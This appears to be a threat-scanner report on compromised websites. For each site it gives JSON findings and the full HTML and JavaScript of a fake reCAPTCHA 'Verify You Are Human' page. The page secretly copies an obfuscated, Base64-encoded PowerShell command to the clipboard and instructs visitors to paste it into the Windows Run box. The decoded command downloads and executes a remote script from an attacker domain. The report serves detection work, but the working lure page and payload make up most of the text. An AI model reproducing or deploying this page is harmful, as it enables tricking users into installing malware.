}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
https://www.bratusferramentas.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
{ "URL": "https://www.bratusferramentas.grupomoltz.com.br/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
https://website.mypetapp.co.za/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
{ "URL": "https://website.mypetapp.co.za/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
